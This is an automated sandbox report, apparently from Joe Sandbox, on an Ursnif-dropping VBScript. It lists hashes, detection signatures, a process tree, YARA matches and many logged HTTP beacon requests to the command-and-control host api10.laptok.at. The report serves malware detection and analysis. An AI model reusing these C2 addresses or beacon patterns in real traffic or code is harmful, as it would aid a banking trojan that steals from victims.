Loading ...

Play interactive tourEdit tour

Analysis Report IYhAQFCrF1sk.vbs

Overview

General Information

Sample Name:IYhAQFCrF1sk.vbs
Analysis ID:285943
MD5:88d06f971fb46ed7164bbaeec852cbb2
SHA1:d8c80137b3ed1168a3a08f15a7bbdd33e5b38fdb
SHA256:29b80298cbd5f207bedb6bdf997cefe1d99ea64b391e8b465661c498dd06c49c

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
WScript reads language and country specific registry keys (likely country aware script)
AV process strings found (often used to terminate AV products)
Contains capabilities to detect virtual machines
Dropped file seen in connection with other malware
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 4588 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\IYhAQFCrF1sk.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • iexplore.exe (PID: 6808 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6824 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6808 CREDAT:9474 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 6992 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5396 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6992 CREDAT:9474 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 8 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 2664 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:8 CREDAT:9474 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5712 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6388 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5712 CREDAT:9474 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000003.500085579.00000000052D8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000003.00000003.500051459.00000000052D8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000003.00000003.500010195.00000000052D8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000003.00000002.1435502688.00000000052D8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000003.00000003.499924506.00000000052D8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 4 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\irritable.docxAvira: detection malicious, Label: TR/AD.UrsnifDropper.wdonj
            Multi AV Scanner detection for domain / URLShow sources
            Source: api10.laptok.atVirustotal: Detection: 7%Perma Link
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\irritable.docxVirustotal: Detection: 41%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\irritable.docxReversingLabs: Detection: 27%
            Multi AV Scanner detection for submitted fileShow sources
            Source: IYhAQFCrF1sk.vbsVirustotal: Detection: 17%Perma Link
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\Temp
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.ini
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local
            Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
            Source: global trafficHTTP traffic detected: GET /api1/vpB6SFrd2r1zi/Pa8XSGRT/EoCxEQKkUcgs_2F6Qlc7nXQ/ztKXRXAL2Y/3eUDp8C_2BcfhMelM/ETlLSXbJPV4s/AnRYDNdt7c3/okUDBbmp8EDMHY/HKaSxQrDUBBwpmmhYHzn0/QvyFKTYOflE40cBo/DkKh1_2FhlMcC6L/7fOXL4lAI_2FGBfbDb/HduDMtTOL/_2BhAVYvxUr9gr_2FzM1/9nkZeY3iyQ8txctpsj7/thhkhTfFGLs8AZhUw8UDWN/1AzFLH4pNPSK4/3_2Fp_0A/_0DK1_2F3cZN_2F1Mzyeo3y/KTaLJRmT4O/0zvZXIEogwyXOoYW3/nZy6Unc86cj4/nTcqCFX3vwyP/p HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/fJ6c2Fa3dA/3CKfLzNor8pqk4Jmg/t6nhaoaQzgIh/iB9KATHxKvZ/TpfZcnDlgVk4zj/7_2F8pgK_2Btw2bEYC0Pu/Z0q_2BTwj2iuZfEd/2UKb6HcV6mA10yN/9cNNl6oo51ZMuw0QxW/XuFC2V6xR/s29kjyEAyfaPl092fqca/evEoUeuS_2FQKcm6_2B/7S9pT5_2B5qgMHA3BU7cA7/rwOp_2B1R6PtE/tF5v0xu9/uYDeuA44rSmxcYtWj0QVX8V/nfjabypDeJ/r7lbuvEF_0A_0DaTm/qzLY9Z7hvBkE/HH_2FzFwcc6/L6ik_2BRZOkCox/9YTDAEzacnC_2B5e5SrCC/HAfhFGe_/2B60tWg HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/MHNewQWU4TN/oFwdVVblAWldph/Q3aIHM5zo_2Ft0LLIwG0K/XFQjeVBHQWvNmCAB/aR4FiLQ6jkZXae2/u1YX53Fc5n6X4KzB_2/FbGhNPpEt/fDnDl62VGRX1v0IWM7vg/8CHYth5UetorlM_2B_2/BwLNlw9_2BrecMrpUjNsl9/txPzv9Lb2ohks/ZeZqkZRH/rPLx9Z976EvAaW37wrZjNXT/M7GuIuAkEU/uBKsUTsb_2FhLiZxa/1eduK9f4ZZ_2/BcFj_2FddwY/DvAV0FioP_0A_0/DMEjm7vhQB509VibnoEup/_2BIoc1tsqsyZM0t/P5f4f6LXLW_/2Fuf HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/pnyPKrKyWn/YCs_2BdKAk1nNhptr/4REunxu4Qu5G/DvcNG5W4SIQ/AZBtRqDLZmxMiX/XXaKgp_2BwveiKrj1ubfr/2uNFyUYoN_2BiJRR/Ildd_2BkZBoDkif/IOXAG7dk1tu8E_2FGP/qgyAjnD1Z/pBRl4kqJZDyqd2KGrPBu/xGR2L1sSFtHg_2FBktK/IXb8Hd4fbNuq2OloYS1pLY/PY7lbW9OVGb_2/FNm9Ae8O/OV0e501bBeTJCA9USafT_2F/E7u_2FMxK_/2Fz6VWc_2FHnsrVk_/0A_0DLiQ70Am/o5ZOpu55gSG/MLfkzpndFcG2zA/lNu8EPK9BE5s/fH5 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/yohkX3BcoIJOj/gvL9oZTc/921HTS_2B7UaQJI2tWmlQF0/kjJwwEkNT6/pz2jpCOgFRtqcZ09L/mKSRYIvFHA0x/Lkbx1SeuQPe/dunrmMUkDBPObk/LkIYTPZEcI24zfB_2BbH0/BWf6z_2Bs4fRU9Ks/0VEeMWHLxMkkjBb/SQNm_2BQI0QtrF2XEs/EK5H7m9y2/L22W2o0fEjIG7QPSAAdX/O_2FHfGKsS2VhvZRM63/HzKqpVIaNmnNkhvWObi4kQ/19Nwkv3e9qZYr/g_0A_0D5/VEEFEucqCllTfisKJxGDGbe/CFM7rGedzm/iX2h2eKWGQAhpP5kb/vy0fFVVUgvWid/JjmJ HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/T6gyfC8mKJMrT_2BJOYUw/pPyXJG84WW4BRuJV/cYDDVfgdDKfi0gW/UtgFnrfi5_2FuCBFIc/e79LvQ72_/2BcI6mIbhc0NcDwn_2BH/7Xstf4s90K9Ko95gwbg/VluZJjlHReL0ltyhjOwnUT/TZs4Z1i7HPhGC/FiA1n06M/qD2CeJAb7WpAkO5aOTlGPOm/8PrRmeRkN7/Whngp0zhjA_2BWkqr/gabe9aav4mFS/LP3DTAttWLF/hoOOpjwD4_2BIu/KAC3b9PGq7HyyaZH_0A_0/DLhYXZfPhf9fc_2F/3qHC3sCINHfdWdP/RHamgk4ellnNNQvwAe/XyST2GdDcmS6o/LixVy1XR/U HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/xHLMpKd4KzxsCSSMRf/LXUUoeqT5/3rQB9KnR0QoLWKOsxPBg/_2BiCRarZtRZXHACBaZ/vf2jPg4cernebni3xaHKbm/ecM3e36FGRad4/ARW7D14X/cdVBTwOBShZ_2B_2FzxYAs9/9yF93xGMAg/bUVgMcllvujHFTYYz/kciZqJDQMbWB/5YrcEc1Wg_2/FFbA8oQmFTTDVa/o6X0o1oGAT2HkvHsiJB0d/YQQjoH_2BaLTDgpd/q8bgauMJ1R38pFw/F49lTOYycGLqP0_0A_/0DI6dR8Nj/FyI4lUQcrIhVAgQI3SVS/TuOFz_2FRhIKMa7kCRY/x0CigvnZy_2BeimR_2FmMi/qagTFl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/QXh09_2BBuuykAz8Uz/e905OHyHa/TkJ2BKC_2BW6J73eHYi4/FymDRjfVYOOlhH_2BA5/JEttZAyYvSgPvQW9hqZTkR/Cy6v1YHb5fLzd/5L_2BS34/0Ku65OEht5G1TW6EIbqunsP/vEv98_2FPr/FdheZXFRyWPugEq3a/2bTxOIqzjNLn/KoLbpa2abFr/rsKHfA7r66eVSD/c_2FuxgZvtc8MJubUR6Gq/adG7QOBJzgcBvpR_/2FGm_2BZlYtwV3V/6snYpFEE_2F1k_2BT1/PtxZK_2F_/0A_0D2ELIcjR_2BHBaSg/V9FVzxiPgyDlmAZEeR6/pQQmroa4VoI26qH5pJZzBX/Fg9axpm25Te/pG6 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/Fkd4DPUY1ovb6BbGZMblZ/rSslZFNH74zZovlb/Jo2wugMV6Fg0y8n/6bRCV_2F_2B0N4NpTo/qA6ETFLL2/Qnq1dpnxZpYJf2cXsT8I/tQTyAIrvQQXn7yH6sUA/OdkHtHCoXSSw9ZnWI8t4PH/7Vy_2B_2BED6f/S0aDCzgh/vPK9EIE7YzgsKcQ3m53uFeY/JLrUZwDLlo/4mmnr_2B7yAlIAzOH/hhDNV5i3BOAx/sOT1TL96eb8/bZFja4e68DkX6z/JStAfEMYG1DZbB_0A_0Dr/O89eHQlA9v7_2B9V/tKGGH0wZoALe0e6/rs1wa48IcU5_2BUs12/FuVDQsAnH/aeHRKo_2BKVM/iNp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/uqVUG_2BN9jfAO_2FcVdw/ygFH3GlO5WLQz_2B/5KhVmm5h26QMSlL/B5e4y0_2F3CmP1xEzr/cScw7AMxR/c2D3beGVKQSyeAM5x7Hp/Hj899ldQzADV4jrYEaU/Z7QINYNfjtjzbmpfyh0d1y/drobXyDpI2jNC/CuzQL_2B/Ve2M8ljWAdR_2BYNbdMGtu3/vZRj0mQ7Ac/kytZzgwC5vrfKvCwK/C33Ftwg4liFu/cRcyzjnoN7M/mPpr_2Bp5oLZMW/dvHnLp4MTfZhQdJjSv_0A/_0Dkok7fiJT5R9uY/7fypdn4zSg0UIVp/Cix972ymjKNJhwyLZ_/2F_2B6oUe/bYr4605uqYzC/8WNk6 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/s5_2BHurSXZzz/PgTwgMtb/dPOszIW_2FBty1qNU2bR14z/r2Dn1oAtWP/RxNZDKrmdeD7FpyWP/vPsMwngfRxSb/YUlsJixBiCl/EBFT11djPtwQUG/yXtitlQd0Xv3ftuapYQIo/le_2BTxaWWqGzWTl/blGbapWyoAtn9VX/7ZPA681S4hKdwkcz1p/JFxmmoQFy/l3ogSM_2BHSz5rwFiJ_2/F17PYIOFi9FfoT23gJd/l_2Ba3H7CNyl_2BeLJTuyM/ytxj4M_2F1G3r/MHmymzq_/0A_0D8bBZx23GoUIKak6yeS/NejDBvTCFy/TRPB47ewvK3QfeYMe/vH_2FMqe4myj/ov_2FAVu/fOwJL3i HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/OUpFLF_2FXP7xWDcDbvV/EE3RE7oMkNkpWeQ8flf/HJtmhA1bIaVV50s_2FzKR5/Dv5y6SQIK_2Bc/qWlbo9gz/SlmbWdLXuL_2BFLREEkc9e7/NvsRDoHalY/Es5_2BVneUzP2rcHA/SYQhAtmjy_2B/bw3jonNO_2B/mf9QnUdGmjrJ31/DmcX_2FYQ2XbgYozDfu1X/uRdPDkeJsC5_2F3_/2Bk7Foz4FaUi0Rx/qkSxQVFGivP_2B_2FD/1aR2PZE_2/BLLUvqvXS02j7CiAA9S_/2Fd7nm2D_2FUBY_0A_0/DxVnQFGE8N7NSN2xL7kYy_/2B24F7Ip4MxvM/kJRm337R/Pn_2FxHsinWJjJe6mMlqhj1/dOV4aIK HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/us2m5mZ_2BL/AjntphCyYzffLl/PJB8r0XZsTPdx4dwRu_2B/7dJq4Ns7GFEkw0XX/9Fx3VKuhGK_2F2e/YeBbDT4KIFjg_2F8i6/AQHVr2MgH/Uscbq8UTMkAqEj4wapH6/SjfAQryGdxhD97JZnD3/_2FaxDyr9J5RL21biWhJPF/U6G_2FdaTFKoW/Yodly0OB/lrvyC_2Bf1mNR_2BXJq0W0Q/GgaX2ea7Ky/GMLBQGM8Gw_2FCJy9/IDSLWjV4GoV1/b4aWv_2FlSx/Qq74fi_2BzGCsw/_2F_0A_0Dda7oB_2BnuFH/N8Wz8ZTEJOzxw81B/W0yhrzIrJCdhtG_/2FvxJqAXzdyg5AYVpj/fxjr5Jpu/bav HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/B3YDpvotP6Z6e/qml9xqtY/wIGY4SOf2Ga2saM_2Fkohj6/_2BOLkZqIz/jaKMhAi10VhTVICj_/2Bhoh8xk_2FC/LDWXows_2Bu/b1lnWd4S1TPfim/rJWrh_2FwoomSx_2FJDCG/J9PcO_2Fjh_2FvM_/2B3l6B894j30_2B/8htLv6CGX_2F48nbR8/qebw_2B4D/UJyeTRYYpTFsWR9CK7x3/rZ1w9djo4DsgvHClJIp/_2ByxaNLLIa1N_2F0tn8Be/Wr4Y4Ut1ry0Tp/1QxPHARQ/uHKqq4LcLtt1p_0A_0DLddv/4l6PDbhAwo/HPC17IY8le87GQXMV/KK6p_2FUbgk4/lrP8nnafKr3/izpy_2BD_2FnwS/N9xt88 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/sUVWCqj7KUgEKzmg/zJusMkP0zxX6k4N/13wQSxnPRkeQLnzWcu/uPya8SbnP/Qgf7OmsyQXuEhHk53NtV/1TODPRQZw4Eq6kGmZ03/NGWZzbGANLl4tgdkqPAXRG/TX4yHF8KQpbCO/vkrUyHSe/pFpjdrOYhrjtMfD4T_2Fcw_/2FwPEfySvR/EN_2FOFWvgcMGy4ie/38kSnuXG8IYw/xzEoebb5kH1/uYzizSlVUQl3DA/Vw3y046mIPZD4LKF9s6us/ojM7AG1FKL_0A_0D/L4KnYjKzh0k7YLp/JMOUMLf2rSsTfTfZGs/LSQja6Hh4/UGeB8luYBN2rqklbwKch/7tivWN HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/Yj_2BtQKkAqsBl4lyD5/Oyal3WWnv3KsyVQSQlLXtL/j1MJHDAacwTd0/WMG1Rl_2/BXWPBVU_2Bfmqpfo3Og5tmy/Wqw_2Bjo_2/FP4ZYJaDBDzh7F3eK/4yDujwST5gzI/qflE7VLrCRD/vCCbJu5oD29uwH/5coI6wMN8h5LPoaF1tpqK/tAOoEfm_2FH2IV0a/T1vuOtI3fHOpKnu/gaZbbVI9_2BIIKoEIs/_2FGEoDfz/OeYD6MHXs57nsWR4N3SU/AXWMua_2Bar4L0a2Q6N/VAZ_0A_0Df2Lai3MsNOotF/804yCEb9uZ81n/NgJpR9PcklG6Z/inorx0xX HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/ma54LvuHJenGK1nw3/tABcJ1mdJbcH/Cz_2FbPYs7U/7cUYzh8JVj71TB/JnzFXTtWTpvcE7LT_2FvH/S23goccFDH899clp/A3z5TKjfofJWQQQ/Absu110dwcFR1mhZB_/2BkNLGKq6/Ki1Xiu8OYBzzjLMUHX5W/9AHXz18jjDOzCq9l3PU/guMM7YZpSt6xt_2Bcc6W8S/3CuEl9sqzucAx/aielrUR1/n0dYbqhaDvQDuRJJVutgTaA/LU0cqIxpW6/T2ncr02ChDzG_0A_0/D0mUOGgcn49b/lWf_2B_2BVV/TYHJO8RjaH7nZj/WTaRKaqZfpY/q4Wg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/nN0_2BeZiAm3pJ/2NdO2sNQQ3yCjAL_2BMbb/1whhYZYBPNFVmI_2/Fhken1SilfZJ8mr/FmDedERFn50ZKI0qfP/YjUgjm84S/cyXy6i3geV7SxqTdgkPt/m9JpI0UGTFgdJR97L7V/I9AyNLFyKWcdJAdN7A_2B_/2BKrMrY_2BTxL/fiQOKnqH/sR5pJhU0U6FiEHV4J6dARBw/csixOb8fvh/E_2FtMFTPegEvbN_2/BjW7CGMiRZ15/GR1M_2FsW6Q/mzTrsWLNoTsJyj/oGKgUtbn_0A_0Dws7Dp8B/ybixm6DhQ9u32m07/iLlFM7OITv7vBD0/NoKxgVZDuOTMFJXs7F/kFjRE64Ft/JKS HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/Z45zPA2Opq8WIL/_2FlG20hkkX5qgn42kWvu/ZWFVtFnrc67_2BjZ/k0BG4bX0fx1KYgV/kH63JcsD3P0xwq_2BX/f23OMVTt4/y14wZq36Oug_2BwmJaiU/JEw1iWxDCp5Xo013A5h/PliBLnDm0NCJ0c11cX_2Bd/MRleSWh1pSVJT/M97uRbcb/9W4Oe_2Fjg_2FIG2tR_2BG4/MeLfWZo_2B/kABRi0AGK3BoxE9Ga/5lOznJDyT_2F/Tm2S99vbEPY/3aW3lH_2F4Hp_2/FP57HTQ8VLf_2BLR_0A_0/DL8zw9B7PA7N4MLC/SycVV9Tm3vgifvz/uk_2FuKWantVazPMVg/P_2FsGupi/VMmgPSo9hQ4k/EMS HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/r61VfVrk_2Bfn6q/RawfUD1Xlr_2Fz75yR/4N_2Bw1VJ/Og27BC1MfN85omeY3EUg/ltIgewXoah_2FGH1GxW/XcVv3jVg5yuZ7wPh48gg4t/eAt0FnRvcL_2F/fXPlXOq7/Isd277kgmAWxUALAqkO_2BP/WJd5fAu0gt/Nwcx0X5prpLg1ghb8/guuG6eqwVeVF/ErI_2Fjx6G9/sMnnHyBnyzuDI5/KsfdwKgXSc_2F7Mzmo2kq/kJqpYSdVHcBLl6Se/DJzBiW9j2XFCOhq/wCgxK_0A_0DAtn4_2F/6OuKlWV9o/qSAdbofW9gCT6uJdZT7z/7IZHUNziQ6ejTLkuwXC/msZK_2FGVdM2na/Jsg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: msapplication.xml1.16.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x7dfdd6ed,0x01d68bdc</date><accdate>0x7dfdd6ed,0x01d68bdc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml1.16.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x7dfdd6ed,0x01d68bdc</date><accdate>0x7e003956,0x01d68bdc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml6.16.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x7e039a03,0x01d68bdc</date><accdate>0x7e039a03,0x01d68bdc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml6.16.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x7e039a03,0x01d68bdc</date><accdate>0x7e039a03,0x01d68bdc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml8.16.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x7e039a03,0x01d68bdc</date><accdate>0x7e039a03,0x01d68bdc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml8.16.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x7e039a03,0x01d68bdc</date><accdate>0x7e05fd06,0x01d68bdc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: unknownDNS traffic detected: queries for: api10.laptok.at
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Sep 2020 18:49:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
            Source: {D082B5AC-F7CF-11EA-90E2-ECF4BB862DED}.dat.23.dr, ~DF13AA7F6DD01F3DF4.TMP.23.drString found in binary or memory: http://api10.laptok.at/api1/MHNewQWU4TN/oFwdVVblAWldph/Q3aIHM5zo_2Ft0LLIwG0K/XFQjeVBHQWvNmCAB/aR4FiL
            Source: {C24EDA0C-F7CF-11EA-90E2-ECF4BB862DED}.dat.21.drString found in binary or memory: http://api10.laptok.at/api1/fJ6c2Fa3dA/3CKfLzNor8pqk4Jmg/t6nhaoaQzgIh/iB9KATHxKvZ/TpfZcnDlgVk4zj/7_2
            Source: {DE716D2B-F7CF-11EA-90E2-ECF4BB862DED}.dat.29.drString found in binary or memory: http://api10.laptok.at/api1/pnyPKrKyWn/YCs_2BdKAk1nNhptr/4REunxu4Qu5G/DvcNG5W4SIQ/AZBtRqDLZmxMiX/XXa
            Source: {A820A091-F7CF-11EA-90E2-ECF4BB862DED}.dat.16.dr, ~DF33CE763D0D4F4B60.TMP.16.drString found in binary or memory: http://api10.laptok.at/api1/vpB6SFrd2r1zi/Pa8XSGRT/EoCxEQKkUcgs_2F6Qlc7nXQ/ztKXRXAL2Y/3eUDp8C_2BcfhM
            Source: msapplication.xml.16.drString found in binary or memory: http://www.amazon.com/
            Source: msapplication.xml2.16.drString found in binary or memory: http://www.google.com/
            Source: msapplication.xml3.16.drString found in binary or memory: http://www.live.com/
            Source: msapplication.xml4.16.drString found in binary or memory: http://www.nytimes.com/
            Source: msapplication.xml5.16.drString found in binary or memory: http://www.reddit.com/
            Source: msapplication.xml6.16.drString found in binary or memory: http://www.twitter.com/
            Source: msapplication.xml7.16.drString found in binary or memory: http://www.wikipedia.com/
            Source: msapplication.xml8.16.drString found in binary or memory: http://www.youtube.com/

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
